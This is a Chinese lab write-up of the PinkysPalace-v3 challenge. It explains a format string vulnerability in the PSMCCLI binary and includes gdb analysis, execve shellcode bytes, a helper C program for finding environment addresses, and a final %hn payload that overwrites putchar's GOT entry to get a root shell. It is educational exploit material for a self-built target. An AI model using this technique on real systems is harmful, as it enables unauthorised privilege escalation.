红队项目PinkysPalace格式字符串缓冲区溢出详解

简介

渗透测试-地基篇

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

缓冲区溢出(buffer overflow),是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。

项目三十六:PinkysPalace-v3,考验了缓冲区溢出知识,该项目存在非常多的知识点,存在PSMCCLI文件,该项目是乌班图环境运行着exe文件,该文件是Pink Sec的控制台程序,该环境就和AWD中的PWN题目一样,直播教学会有多种方法详细解释如何理解缓冲区溢出,如何发现缓冲区溢出,遇到缓冲区溢出如何利用,栈是什么等等问题详解。

接下来我讲分享其中方法一给到各位小伙伴学习,欢迎大佬

二、项目介绍

该项目存在非常多的知识点和防护手段,需要很强的基础知识和渗透手段才可以攻破拿到该服务器权限,一路旅程从:

外网信息收集->模块Nday->端口转发->数据库枚举->Fuzz测试->内部信息枚举->So库手写提权

才到咱们本章最有意思的格式字符串缓冲区溢出点,当然前面的逻辑贯穿能力也不可缺失,接下来将详细介绍格式字符串缓冲区如何溢出提权的,在栈空间中遨游!

1648989753_624996396fef58f42b550.png!small?1648989755645

通过nm工具详细私下So库文件,并利用So库手写恶意库并植入psbanner、psopt、psoption函数提权后,进入了缓冲区的世界内,今天仅仅讲解缓冲区溢出,让各位学到更多,接下来是通过提权拿到了该普通用户权限:
 

1648989761_62499641be1857c8740b7.png!small?1648989766384


[+] Pink Sec Management Console CLI
Pink Sec的控制台程序,疑似存在缓冲区溢出!

三、下载程序

将该文件base64转发下载到本地进行逆向分析:
1)base64转码

1648989766_62499646bec6f1d651998.png!small?1648989782692

cd /usr/local/bin/
base64 PSMCCLI

2)将转码值写入本地文本并解码成文件

1648989772_6249964c8b7c2ca5ab216.png!small?1648989782692

vi base64.txt   ---放入base64编译值
cat base64.txt | base64 -d > PSMCCLI
md5sum PSMCCLI   ---双方MD5值对比(因MD5不可逆)

四、缓冲区溢出测试

使用python测试是否存在缓冲区溢出,当然perl也是可以的。

1648989777_624996511134fb8ca39ee.png!small?1648989782692

./PSMCCLI $(python -c 'print "A"*100')
./PSMCCLI $(python -c 'print "A"*200')
./PSMCCLI $(python -c 'print "A"*2000')

将100、200、2000....个A发送给程序,都未能造成分段错误等情况,不存在缓冲区溢出?

缓冲区溢出分为栈溢出、堆溢出、格式字符串溢出,目前仅仅测试了最基础的溢出手法,来看看该程序的函数主体,将用到GDB!

gdb是GNU开源组织发布的一个强大的Linux下的程序调试工具,逆向分析有非常多好用的工具,但是GDB毋庸置疑是最强之一,它的pwndbg和peda插件那就是辅助GDB上神器行列的最强帮手。

1648989785_624996597d1c61d47c746.png!small?1648989800664

chmod +x PSMCCLI   ---赋权
gdb PSMCCLI    ---gdb调试
disas main    ---查看主函数
disas argshow   ---主函数调用了argshow进行深部查看

argshow用于显示参数,被main函数调用,可以在argshow中看到两个printf调用!再说格式化字符串漏洞之前,先了解一下printf函数和利用该漏洞的重要格式化字符串%n,利用他可以做到任意内存写入!

函数原型

int printf ("格式化字符串",参量... )

函数的返回值是正确输出的字符的个数,如果输出失败,返回负值。

参量表中参数的个数是不定的(如何实现参数的个数不定,可以参考《程序员的自我修养》这本书),可以是一个,可以是两个,三个...,也可以没有参数。
printf函数的格式化字符串常见的有%d,%f,%c,%s,%x(输出16进制数,前面没有0x),%p(输出16进制数,前面带有0x)等等。
但是有个不常见的格式化字符串%n,它的功能是将%n之前打印出来的字符个数,赋值给一个变量。

除了%n,还有%hn,%hhn,%lln,分别为写入目标空间2字节,1字节,8字节。注意是对应参数(这个参数是指针)的对应的地址开始起几个字节。不要觉得%lln,取的是8个字节的指针,%n取的就是4个字节的指针,取的是多少字节的指针只跟程序的位数有关,如果是32位的程序,%n取的就是4字节指针,64位取的就是8字节指针,这是因为不同位数的程序,每个参数对应的字节数是不同的。

该处调用了两个printf,调用可能会产生格式字符串漏洞!测试!

1648989794_624996621969b3f9c717c.png!small?1648989800664

./PSMCCLI %x                           
[+] Args: f7f34480

%x是printf支持的格式字符串!用来显示关联十六进制输入数值!通过输入%x从堆栈中获取一个值:Args: f7f34480,将内存当做参数以16进制输出,这样就会造成内存泄露,可查看该二进制程序会受到格式字符串漏洞的影响导致溢出!

五、格式字符串缓冲区溢出攻击

1、查看二进制程序启用的安全保护

ELF安全特性检查工具:hardening-check
详细参考使用文章:

http://manpages.ubuntu.com/manpages/trusty/man1/hardening-check.1.html

1648989801_624996694c536cd18a1f2.png!small?1648989802709

Read-only relocations: yes

七种安全机制六种都显示no, not found!仅RELocation Read-Only只读重定位开启,这是一个简单直接的格式字符串漏洞!

RELRO(Relocation Read Only)重定向只读解读:
在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域,所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处。

原理
GCC,GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术:read only relocation。大概实现就是由linker指定binary的一块经过dynamic linker处理过relocation之后的区域为只读,用来防御hijack GOT攻击。

设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。RELRO为"Partial RELRO",说明我们对GOT表具有写权限。

2、shellcode写入环境空间

1)攻击思路

格式字符串允许利用两个基本的攻击向量:

1. 直接内存访问:使用%x格式字符串和位置值,可以打印或访问堆栈中的任何内存位置。
2. 写入位置的能力:可以使用%n格式字符串写入任何位置,%n将到目前为止打印的字符数写入所选位置。

那么思路很清晰了,先用%x定位位置,在位置中%n植入shellcode,用%hn执行。

2)选择shellcode

shellcode最大轻量网站之一:

http://shell-storm.org/shellcode/files/shellcode-827.php

我选择了827,当然别的也是能过的,主要基于系统环境决定即可。

1648989808_624996709eb4382bde32e.png!small?1648989809403

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69""\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

把核心shellcode拿出,利用格式字符串漏洞,通常将shell代码放在环境变量中,并将程序流重定向到环境变量的地址即可!

3)shellcode写入环境

将偏移量移到/tmp目录中,并对其进行排序,用python写入:

1648989816_62499678165a3aad9327b.png!small?1648989816720

export SPAWN=$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'")

3、获取执行shellcode栈地址

因为在argshow函数中调用了两个printf,当printf结束后执行的是putchar函数,这边思路覆盖putchar函数,因为它是printf之后的下一个函数,要获取需要覆盖的位置,我在运行程序之前先拆装了putchar函数,方便包含它在运行时加载的地址:

1648989820_6249967cb22c9a5ae8063.png!small?1648989824931

gdb PSMCCLI
disas putchar
0x804a01c

获得putchar的栈地址!

4、定位环境变量的地址

当环境变量中植入shellcode后,需要找到覆盖覆盖函数的地址!
植入shellcode需要找到地址该脚本可以找:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>int main(int argc, char *argv[]) {char *ptr;if(argc < 3) {printf("Usage: %s <environment variable> <target program name>\n", argv[0]);exit(0);}ptr = getenv(argv[1]); /* get env var location */ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */printf("%s will be at %p\n", argv[1], ptr);
}

将保存到:getenvaddr.c(在项目环境操作)

1648989828_62499684044937dd8c3ea.png!small?1648989834760

nano getenvaddr.c
gcc -o getenvaddr getenvaddr.c
chmod +x getenvaddr

gcc编译getenvaddr二进制文件,开始查看变量空间地址!

1648989832_624996883533da8d01b8d.png!small?1648989834760

./getenvaddr
Usage: ./getenvaddr <environment variable> <target program name>

前面已经将shellcode放入环境变量中了,现在可以使用SPAWN在执行目标二进制文件期间找到环境变量在内存中的位置:

1648989836_6249968c29f6fb84ffcbc.png!small?1648989837113

./getenvaddr SPAWN /usr/local/bin/PSMCCLI
SPAWN will be at 0xbffffe94

shellcode地址:0xbffffe94 ---要覆盖的内存地址
putchar地址:0x0804a01c ---写入的地址
所以此时有两个地址,需要将shell代码的地址写入putchar的指针存放位置。

5、确认Args位置

此时有两个地址需要将shell代码的地址写入putchar的指针存放位置即可!
现在的目标是在参数中引入一些地址并尝试访问它们!在参数中引入了两个地址 AAAA (0x41414141) 和 BBBB (0x42424242)!还需要第三位填充(CCC)。

1648989840_62499690adfc05b3af5f1.png!small?1648989854584

/usr/local/bin/PSMCCLI AAAABBBBCCC$(python -c "print '%x.'*138")
......0.494c43.41414141.42424242.......

此处我用了三个C!
在此处必须找到完整的排序41414141,42424242对应四个A和B,如果不完整按照最前面讲解的基础加个0,可看到它们分布在两个内存中!
接下来需要确定这两个内存地址在什么位置!这里确认位置可以用for循环,也可以猜解!当然我在项目直播中是详细讲解了,来吧加油~

1648989844_62499694ea6e86e671e77.png!small?1648989854584

/usr/local/bin/PSMCCLI AAAABBBBCCC%135\$0x%136\$0x
[+] Args: AAAABBBBCCC4141414142424242

如果不起作用,就用C和0填充即可!找到了内存地址为135-136!

6、Exp-前半段地址确定

现在需要访问putchar指针的地址(要修改的地址),即0x0804a01c!32位架构中的内存为4字节(32位)大小。然而将使用格式字符串漏洞进行写入也就是两字节写入。所以需要把地址分成两个字节:

低位地址:0x0804a01c
高位地址:0x0804a01e(初始地址+2)

地址字节的顺序是颠倒写的:

1648989849_6249969970b3016a62c18.png!small?1648989854019

/usr/local/bin/PSMCCLI $(printf "\x1c\xa0\x04\x08\x1e\xa0\x04\x08")CCC%135\$0x%136\$0x
[+] Args: CC4a01c004a01e08

前半部分可以访问所需的地址值了!接下来就可以按照前面的思路,将%x改为%n进行写入内存地址操作!

7、Exp-后半段地址确定错误详解

只需将%x更改为%n即可!使用%x访问的内存位置!

1648989853_6249969d9f86479a54b47.png!small?1648989854585

/usr/local/bin/PSMCCLI $(printf "\x1c\xa0\x04\x08\x1e\xa0\x04\x08")CCC%135\$0n%136\$0n
Segmentation fault

终于报分段错误了,这就体现出了该处存在缓冲区溢出!那么为什么报错了?

这边出现了分段错误,因为%n会将到目前为止已打印的字符数写入正在访问的内存中,上面的代码会将11(0xb)写入高位和低位存储短字节中,这是一个非法地址,所以报错!那么接下来要找到正确的内存空间地址值进行计算准确!也是最难的一部!

8、内存空间准确计算定位

shellcode地址位置计算,需要将值0xbffffe94写入内存字节中,每个短字节最多只能容纳0xffff,因此需要将值拆分为两个短字节:

shellcode地址:0xbffffe94

打开计算器:选择程序员->HEX

1648989858_624996a20e82833937bf9.png!small?1648989862387

低位短字节地址: 0xfe94 = 65172   
高位短字节地址: 0xbfff = 49151

1648989863_624996a7620c22e097d58.png!small?1648989867140


在前面确认内存位置时,输入了:
AAAABBBBCCC(11个字节)两个四字节和三个C填充!

前半部分=49151 后半部分=65172-11bytes = 65161
接下来使用%u格式说明符来引入那么多额外的字符即可!

9、整数溢出思路写法

现在修复了低位短字节,需要将0xbfff写入高位短字节然后0xbff(3071)低于0xfe94!

1648989868_624996ac166ef7d1f3ac1.png!small?1648989869066

65161
49515
用了三个C

因此需要0x1bfff-0xfe94=49515个字符来写入所需的0xbfff值!
强调:这里需要计算器直接计算十六进制值,不要加减法单独计算!

10、最终payload

根据前面函数原型介绍提示,除了%n,还有%hn,%hhn,%lln,分别为写入目标空间2字节,1字节,8字节。接下来将使用%u定位内存空间刚计算出的准确位置,然后在用%hn进行写入目标的最底层字节空间中!

咱们这里拿出上面分段错误做个对比!
分段错误payload:

/usr/local/bin/PSMCCLI $(printf "\x1c\xa0\x04\x08\x1e\xa0\x04\x08")CCC%135\$0n%136\$0n

写入空间位置地址准确值:

/usr/local/bin/PSMCCLI $(printf "\x1c\xa0\x04\x08\x1e\xa0\x04\x08")CCC%65161u%135\$0hn%49515u%136\$0hn

1648989877_624996b503b52e99411af.png!small?1648989878449


成功完成格式字符串缓冲区溢出,溢出提权!

六、经验总结

今天学到ELF格式字符串缓冲区溢出中GDB对程序进行逆向分析,熟悉查看二进制程序启用的安全保护、shellcode写入环境空间、获取执行shellcode栈地址、定位环境变量的地址、确认Args位置、Exp-前半段地址确定、Exp-后半段地址确定错误详解、内存空间准确计算定位、整数溢出思路写法、最终写出溢出payload的方法等等操作,最后远程代码执行控制服务器等操作,学到了非常多的小技巧和干货,希望小伙伴能实际操作复现一遍!来巩固告知企业单位的漏洞情况,并尽快进行加固巩固安全!

提醒:

1. 每次进入环境格式字符串缓冲区溢出内存地址、栈空间都是随机变动的!
2. 随着变动需要用C和0去调试格式字符串,从而达到每一步的效果。
3. 通过每一步的payload不可跳跃执行,需要仔细操作计算,例如%0x,接下也是对应即可
4. 计算空间准确值必须仔细,错一位数都无法溢出!

希望大家提高安全意识,没有网络安全就没有国家安全!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

同时每个成长路线对应的板块都有配套的视频提供: 

大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~ 

 读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/16816.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

视频白平衡没调好怎么补救 视频白平衡调整用哪些参数 会声会影视频制作教程

没有调不好的白平衡&#xff01;如果有&#xff0c;那就是你的方法没用对。无论你的视频发黄还是发蓝&#xff0c;只要掌握本文提供的方法&#xff0c;简单几步就能纠正色偏、校准白平衡。操作很简单&#xff0c;几乎所有人都能够轻松掌握。有关视频白平衡没调好怎么补救&#…

Android 布局中@NULL的使用和代码实现方式详解

文章目录 1、使用场景2、示例代码实现2.1、移除背景2.2 、移除文本2.3、移除布局宽度或高度2.4、移除提示文本2.5、移除图像资源 3、综合示例3.1、布局文件 activity_main.xml3.2、主活动文件 MainActivity.java3.4、资源文件3.5、运行结果 4、优点5、缺点6、综合分析6.1、适用…

.net core web项目部署IIS报错:HTTP 错误 413.1 - Request Entity Too Large

HTTP 错误 413.1 - Request Entity Too Large 解决办法 这个报错的原因是因为IIS配置问题&#xff0c;IIS最大默认配置只有30M&#xff0c;超过30M就会报错 解决办法 在程序中配置能接收最大字节大小 //配置请求头中能最大接收多少数据 //builder.WebHost.UseKestrel(option…

VGG论文解析—Very Deep Convolutional Networks for Large-Scale Image Recognition

VGG论文解析—Very Deep Convolutional Networks for Large-Scale Image Recognition -2015 研究背景 大规模图像识别的深度卷积神经网络 VGG&#xff08;牛津大学视觉几何组&#xff09; 认识数据集&#xff1a;ImageNet的大规模图像识别挑战赛 LSVRC-2014&#xff1a;Image…

linux系统——nohup后台运行程序

nohup可以将正在执行程序以后台挂起形式执行&#xff0c;也即为执行结果不打印到终端 具体使用可以&#xff0c;nohup待执行的命令&#xff0c;可以将执行命令结果输出到当前目录的nohup.out文件内 nohup也有其他用法

MyCat2之分库分表

原理 一个数据库由很多表的构成&#xff0c;每个表对应的不同的业务&#xff0c;垂直切分是指按照业务将表进行分类&#xff0c;分不到不同的数据库上&#xff0c;这样压力就分担到了不同的库上面。 数据分片 数据分片包括里&#xff1a;垂直分片和水平分片&#xff0c;垂直分…

安装依赖报-gyp: No Xcode or CLT version detected!

错误 > node-gyp rebuild No receipt for com.apple.pkg.CLTools_Executables found at /. No receipt for com.apple.pkg.DeveloperToolsCLILeo found at /. No receipt for com.apple.pkg.DeveloperToolsCLI found at /. gyp: No Xcode or CLT version detected! gyp ERR!…

【wiki知识库】02.wiki知识库SpringBoot后端的准备

&#x1f4dd;个人主页&#xff1a;哈__ 期待您的关注 目录 一、&#x1f525;今日目标 二、&#x1f4c2;打开SpringBoot项目 2.1 导入所需依赖 2.2修改application.yml配置文件 2.3导入MybatisPlus逆向工程工具 2.4创建一个公用的返回值 2.5创建CopyUtil工具类 2.6创建…

科技与心理学的协同舞蹈

在探讨盲人如何利用如“蝙蝠避障”这样的辅助软件融入日常生活的同时&#xff0c;我们不得不深入触及盲人教育心理学的核心&#xff0c;这一领域致力于理解盲人在学习与成长过程中独特的心理需求与挑战&#xff0c;以及如何通过教育策略激发他们的潜能&#xff0c;促进全面发展…

前端Vue自定义顶部搜索框:实现热门搜索与历史搜索功能

前端Vue自定义顶部搜索框&#xff1a;实现热门搜索与历史搜索功能 摘要&#xff1a; 随着前端开发复杂性的增加&#xff0c;组件化开发成为了提高效率和降低维护成本的有效手段。本文介绍了一个基于Vue的前端自定义顶部搜索框组件&#xff0c;该组件不仅具备基本的搜索功能&am…

Micro SD封装是什么?

我们了解客户对于Micro SD封装的疑问。在这篇文章中&#xff0c;我们将详细解释Micro SD封装是什么&#xff0c;以及其在存储领域的技术原理和应用情况&#xff0c;帮助客户更好地理解这一技术。 1. Micro SD封装的定义 Micro SD封装是指一种特定尺寸的存储芯片封装方式&#x…

windows 11 23H2更新总是失败解决过程

频繁更新失败的困扰 最近一个月以来 windows 11 系统 23H2 更新总是失败&#xff0c;更新失败会撤销更改: 之后会自动重启系统&#xff0c;但是重启进不去系统&#xff0c;屏幕有背光但是不显示任何内容。 这时候只能长按开机键强制关机。每次出现这种情况我都没办法远程连接到…

大规模团队的数据库开发,如何用OceanBase工具快速建立企业级账号体系

前言 为了让数据库开发的安全性与可靠性得以充分保障&#xff0c;数据库开发工具的管控能力显得尤为关键。构建一个健全的账号体系&#xff0c;能够协助开发团队实现对数据库开发工具的全方位管控&#xff0c;从而有效防范各类数据安全隐患&#xff0c;确保数据库开发的顺利进…

【Python】搭建pypi私仓

1. 下载依赖 pip install pypiserver # 命令安装 pypiserver 库 pip install passlib # passlib 包来读取 Apache htpasswd 文件apt-get install -y apache2-utils2. 生成密码 使用htpasswd库在指定路径/path/to/.pypipasswd生成密码文件 htpasswd -c /path/to/.pypipasswd …

【开源】租房管理系统 JAVA+Vue+SpringBoot+MySQL

目录 一、系统介绍 租客屋主模块 房源信息模块 租客评价模块 房源订单模块 留言板模块 二、系统截图 三、核心代码 一、系统介绍 基于Vue.js和SpringBoot的租房管理系统&#xff0c;分为管理后台和用户网页端&#xff0c;可以给管理员、租客和屋主角色使用&#xff0c…

大模型应用之基于Langchain的测试用例生成

一 用例生成实践效果 在组内的日常工作安排中&#xff0c;持续优化测试技术、提高测试效率始终是重点任务。近期&#xff0c;我们在探索实践使用大模型生成测试用例&#xff0c;期望能够借助其强大的自然语言处理能力&#xff0c;自动化地生成更全面和高质量的测试用例。 当前…

【cocos creator】进度条控制脚本,支持节点进度条,图片进度条,进度条组件,和进度文字展示

进度条控制脚本&#xff0c;支持节点进度条&#xff0c;图片进度条&#xff0c;进度条组件&#xff0c;和进度文字展示 const { ccclass, property, menu } cc._decorator;let text_type cc.Enum({"20%": 0,"1/5": 1,"差值": 2,"自定义…

【计算机毕业设计】基于SSM++jsp的汽车客运站管理系统【源码+lw+部署文档】

目录 第1章 绪论 1.1 课题背景 1.2 课题意义 1.3 研究内容 第2章 开发环境与技术 2.1 MYSQL数据库 2.2 JSP技术 2.3 SSM框架 第3章 系统分析 3.1 可行性分析 3.1.1 技术可行性 3.1.2 经济可行性 3.1.3 操作可行性 3.2 系统流程 3.2.1 操作流程 3.2.2 登录流程 3.2.3 删除信息流…

人大金仓 KingBase查询死锁,释放死锁

人大金仓(kingbase)查询数据库死锁及释放 kingbase锁表排查以及释放锁 总结下 -- 查询&#xff0c;可自己添加where条件 SELECT * FROM sys_stat_activity WHERE state ! idle AND wait_event_typeLock-- 结束进程 SELECT sys_terminate_backend(pid);

PLC集成BL121PO网关优化智能电网的远程管理PLC转OPC UA协议

随着工业自动化技术的不断发展&#xff0c;智能电网等复杂系统对于设备之间高效通信的需求日益增加。PLC转OPC UA协议转换网关BL121PO作为一款领先的协议转换设备&#xff0c;通过其独特的设计和功能&#xff0c;为用户提供了高效、安全的PLC接入OPC UA的解决方案。 设备概述 …